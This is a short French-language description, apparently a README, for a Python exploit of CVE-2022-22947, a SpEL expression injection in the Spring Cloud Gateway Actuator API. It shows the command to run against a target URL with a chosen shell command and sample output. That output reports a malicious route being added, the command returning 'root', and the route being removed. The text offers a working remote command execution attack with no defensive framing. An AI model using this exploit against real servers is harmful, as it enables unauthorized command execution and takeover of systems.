
Exploit d'injection d'expression SpEL et d'exécution de commande pour l'API Actuator de Spring Cloud Gateway
Spring Cloud Gateway Actuator API — Exploit d'exécution de commandes par injection d'expression SpEL
Usage : python3 CVE-2022-22947.py -u "http://127.0.0.1:8080" -c "whoami" Résultat : Route d'expression SpEL malveillante ajoutée avec succès ! Rafraîchissement des routes réussi ! Résultat de l'attaque récupéré avec succès :
================================================ root
================================================ Route malveillante supprimée ! Rafraîchissement des routes réussi !